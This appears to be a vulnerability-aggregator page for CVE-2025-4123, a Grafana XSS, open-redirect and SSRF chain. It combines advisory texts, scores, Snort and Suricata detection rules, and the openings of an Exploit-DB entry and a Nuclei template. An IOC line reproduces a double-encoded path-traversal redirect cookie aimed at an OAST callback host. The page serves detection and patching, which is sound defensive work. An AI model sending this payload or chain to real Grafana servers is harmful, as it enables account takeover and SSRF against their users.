CVE-2025-4123
published 2025-05-22CVE-2025-4123: A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect…
PriorityP278medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
97.81%
99.9th percentile
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF.
The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | grafana_grafana | >= 0 < 0.0.0-20250521183405-c7a690348df7 | 0.0.0-20250521183405-c7a690348df7 |
| grafana | grafana | < 10.4.18 | 10.4.18 |
| grafana | grafana | — | — |
| grafana | grafana | — | — |
| grafana | grafana | — | — |
| grafana | grafana | — | — |
| grafana | grafana | — | — |
| grafana | grafana | — | — |
| grafana | grafana | — | — |
| grafana | grafana | >= 10.4.18+security-01 < 10.4.19 | 10.4.19 |
| grafana | grafana | >= 11.2.0 < 11.2.9 | 11.2.9 |
| grafana | grafana | >= 11.2.9+security-01 < 11.2.10 | 11.2.10 |
| grafana | grafana | >= 11.3.0 < 11.3.6 | 11.3.6 |
| grafana | grafana | >= 11.3.6+security-01 < 11.3.7 | 11.3.7 |
| grafana | grafana | >= 11.4.0 < 11.4.4 | 11.4.4 |
| grafana | grafana | >= 11.4.4+security-01 < 11.4.5 | 11.4.5 |
| grafana | grafana | >= 11.5.0 < 11.5.4 | 11.5.4 |
| grafana | grafana | >= 11.5.4+security-01 < 11.5.5 | 11.5.5 |
| grafana | grafana | >= 11.6.0 < 11.6.1 | 11.6.1 |
| grafana | grafana | >= 11.6.1+security-01 < 11.6.2 | 11.6.2 |
| grafana | grafana | >= 12.0.0+security-01 < 12.0.1 | 12.0.1 |
| msrc | cbl2_podman_on_cbl_mariner_2.0 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
cookieredirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..↗
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)"; flow:established,to_server; http.uri; url_decode; content:"/public/"; fast_pattern; pcre:"/^(?:\x2e|\x2f|\x25(?:25)?2[eEfF])+(?:\x5c|\x25(?:25)?5[cC])/R"; reference:url,www.ox.security/confirmed-critical-the-grafana-ghost-exposes-36-of-public-facing-instances-to-malicious-account-takeover/; reference:cve,2025-4123; classtype:web-application-attack; sid:2063023; rev:1;)
- →Detect double-URL-encoded path traversal sequences targeting /public/ or /render/public/ endpoints; look for %252f, %255C, %2F%5C patterns in HTTP URI indicating client-side path traversal chained with open redirect. ↗
- →Monitor for HTTP 302 redirect responses from Grafana where the Location header contains backslash-prefixed external hostnames (e.g., /\<external-host>/?/) — a hallmark of successful open redirect exploitation.
- →Alert on the redirect_to cookie containing double-encoded path traversal and external OAST/DNS callback domains, indicating active exploitation or probing. ↗
- →For SSRF detection, correlate Grafana server outbound DNS/HTTP requests to unexpected external hosts with inbound requests to /render/public/ containing path traversal sequences; SSRF is confirmed when content-type image/png is returned alongside an interactsh/DNS callback hit.
- →Use Shodan query `product:"Grafana"` or FOFA query `app="Grafana"` to identify exposed instances for asset inventory and patch prioritization.
- →The M2 Snort rule targets the /a/<plugin>/explore URL pattern combined with path traversal in the raw URI — monitor GET requests to /a/ endpoints that include /explore HTTP/ and backslash-encoded traversal sequences.
- ·The default Grafana Content-Security-Policy (CSP) blocks XSS via the connect-src directive, but does NOT fully prevent exploitation — client-side enforcement limitations mean the open redirect and SSRF chains remain exploitable. ↗
- ·If anonymous access is enabled in Grafana, the XSS attack requires NO authentication whatsoever, significantly expanding the attack surface. ↗
- ·If the Grafana Image Renderer plugin is installed, the open redirect can be escalated to a full-read SSRF, enabling access to internal services and cloud metadata endpoints. ↗
- ·The plugin feature (required for XSS exploitation) is enabled by default in Grafana, meaning most unpatched instances are exploitable without any configuration changes. ↗
- ·Exploitation requires user interaction (victim must click a crafted link) and an active user session at the time of the click — purely passive exploitation is not possible. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
osv6.1MEDIUM
vulncheck7.6HIGH
vendor_redhat7.6HIGH
vendor_msrc3.3LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin in github.com/grafana/grafana
osv·2025-05-27
CVE-2025-4123 Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin in github.com/grafana/grafana
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin in github.com/grafana/grafana
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin in github.com/grafana/grafana.
NOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.
(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)
The additional affected modules and versions are: github.com/grafana/grafana before v0.0.0-20250521183405-c7a690348df7.
GHSA
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin
ghsa·2025-05-22
CVE-2025-4123 [HIGH] CWE-79 Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF.
The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
OSV
CVE-2025-4123: A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect
osv·2025-05-22·CVSS 6.1
CVE-2025-4123 [MEDIUM] CVE-2025-4123: A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
OSV
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin
osv·2025-05-22
CVE-2025-4123 [HIGH] Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF.
The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
VulnCheck
Grafana Labs Grafana Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2025·CVSS 7.6
CVE-2025-4123 [HIGH] Grafana Labs Grafana Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Grafana Labs Grafana Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF.
The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
Affected: Grafana Labs Grafana
Required Action: Apply remediations or mitigations per vendor instructi
Red Hat
grafana: Cross-site Scripting (XSS) in Grafana via Custom Frontend Plugins and Open Redirect
vendor_redhat·2025-05-15·CVSS 7.6
CVE-2025-4123 [HIGH] CWE-79 grafana: Cross-site Scripting (XSS) in Grafana via Custom Frontend Plugins and Open Redirect
grafana: Cross-site Scripting (XSS) in Grafana via Custom Frontend Plugins and Open Redirect
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF.
The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
A flaw was found in Grafana's custom frontend plugin handling. This vulnerability allows an attacker to perform a cro
Microsoft
A flaw was found in Buildah. The local path and the lowest subdirectory may be disclosed due to incorrect absolute path traversal, resulting in an impact to confidentiality.
vendor_msrc·2022-12-13·CVSS 3.3
CVE-2022-4123 [LOW] CWE-23 A flaw was found in Buildah. The local path and the lowest subdirectory may be disclosed due to incorrect absolute path traversal, resulting in an impact to confidentiality.
A flaw was found in Buildah. The local path and the lowest subdirectory may be disclosed due to incorrect absolute path traversal, resulting in an impact to confidentiality.
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Mari
Suricata
ET WEB_SPECIFIC_APPS Grafana Open Redirect (CVE-2025-4123) M2
suricata·2025-11-26·CVSS 7.6
CVE-2025-4123 [HIGH] ET WEB_SPECIFIC_APPS Grafana Open Redirect (CVE-2025-4123) M2
ET WEB_SPECIFIC_APPS Grafana Open Redirect (CVE-2025-4123) M2
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Grafana Open Redirect (CVE-2025-4123) M2"; flow:established,to_server; http.request_line; content:"GET /a/"; content:"/explore HTTP/"; fast_pattern; http.uri.raw; content:"public"; pcre:"/^(?:\x2f|%(?:25)?2[fF])(?:(?:\x2e|%(?:25)?2[Ee]){1,2}(?:\x2f|%(?:25)?2[Ff]){1,})+(?:\x5c|%(?:25)?5[cC])/R"; reference:url,nightbloodz.github.io/grafana-CVE-2025-4123/; reference:cve,2025-4123; classtype:web-application-attack; sid:2065930; rev:1; metadata:affected_product Grafana, attack_target Server, tls_state TLSDecrypt, created_at 2025_11_26, cve CVE_2025_4123, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag
Suricata
ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)
suricata·2025-06-17·CVSS 7.6
CVE-2025-4123 [HIGH] ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)
ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)"; flow:established,to_server; http.uri; url_decode; content:"/public/"; fast_pattern; pcre:"/^(?:\x2e|\x2f|\x25(?:25)?2[eEfF])+(?:\x5c|\x25(?:25)?5[cC])/R"; reference:url,www.ox.security/confirmed-critical-the-grafana-ghost-exposes-36-of-public-facing-instances-to-malicious-account-takeover/; reference:cve,2025-4123; classtype:web-application-attack; sid:2063023; rev:1; metadata:affected_product Grafana, attack_target Server, created_at 2025_06_17, cve CVE_2025_4123, deployment Perimeter, deployment Internal, performance_impact Moderate, confidence Me
Exploit-DB
Grafana 11.6.0 - SSRF
exploitdb·2026-04-06·CVSS 7.6
CVE-2025-4123 [HIGH] Grafana 11.6.0 - SSRF
Grafana 11.6.0 - SSRF
---
# Exploit Title: Grafana 11.6.0 - SSRF
# FOFA: app="Grafana"
# Date: 2-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 11.2.0 - 11.6.0
# CVE: CVE-2025-4123
Description:
An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure
Nuclei
Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
nuclei·CVSS 6.1
CVE-2025-4123 [MEDIUM] Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
Template:
id: CVE-2025-4123
info:
name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeov
Bleepingcomputer
Over 46,000 Grafana instances exposed to account takeover bug
blogs_bleepingcomputer·2025-06-15·CVSS 7.6
CVE-2025-4123 [HIGH] Over 46,000 Grafana instances exposed to account takeover bug
## Over 46,000 Grafana instances exposed to account takeover bug
## Bill Toulas
More than 46,000 internet-facing Grafana instances remain unpatched and exposed to a client-side open redirect vulnerability that allows executing a malicious plugin and account takeover.
The flaw is tracked as CVE-2025-4123 and impacts multiple versions of the open-source platform used for monitoring and visualizing infrastructure and application metrics.
The vulnerability was discovered by bug bounty hunter Alvaro Balada and was addressed in security updates that Grafana Labs released on May 21.
However, as of writing this, more than a third of all Grafana instances reachable over the public internet have not been patched, according to researchers at aplication security company OX Security, who refer to
Wiz
Crying Out Cloud Newsletter - June 2025 | Wiz
blogs_wiz·2025-06-01·CVSS 9.8
[CRITICAL] Crying Out Cloud Newsletter - June 2025 | Wiz
Welcome back!
This month we’ve seen a lot of action, with both vulnerabilities and security incidents that have left users affected. We bring you the latest cloud security highlights, to help you stay informed and stay secure. Here are our top picks of cloud security highlights!
## 🔍 Highlights
## Ivanti EPMM RCE Vulnerability Chain Exploited in the Wild
On May 13th, 2025, Ivanti disclosed that Endpoint Manager Mobile (EPMM) is affected by a vulnerability chain combining an authentication bypass (CVE-2025-4427) and a post-authentication remote code execution vulnerability (CVE-2025-4428). These flaws, which stem from unsafe use of Java Expression Language in error messages and misconfigured routing, can be exploited together to achieve unauthenticated RCE. Therefore, while neither of t
Greynoiseio
NoiseLetter December 2025
blogs_greynoiseio·CVSS 10.0
[CRITICAL] NoiseLetter December 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
HackerOne
CVE‑2025‑4123 — Grafana Open Redirect → Stored XSS → SSRF (Full Read) at ██████
hackerone·2026-01-12
[HIGH] CVE‑2025‑4123 — Grafana Open Redirect → Stored XSS → SSRF (Full Read) at ██████
CVE‑2025‑4123 — Grafana Open Redirect → Stored XSS → SSRF (Full Read) at ██████
## Summary
**CVE‑2025‑4123** is a high‑severity vulnerability in **Grafana OSS and Enterprise** that allows unauthenticated attackers to chain multiple flaws:
* **Open Redirect** via path traversal in the public redirect handler.
* **Stored XSS** through malicious plugin injection.
* **Full‑read SSRF** if the Grafana Image Renderer plugin is installed.
This can lead to **account takeover, data theft, and internal network compromise**.
---
## 3. Affected Products
* Grafana OSS & Enterprise **8.x through 12.x**
* **Not affected**: Grafana Cloud (managed service)
* **Vulnerable configurations**:
* Anonymous access enabled
* Image Renderer plugin installed
* Outbound egress to the internet is allowed
---
2025-05-22
Published
Exploited in the wild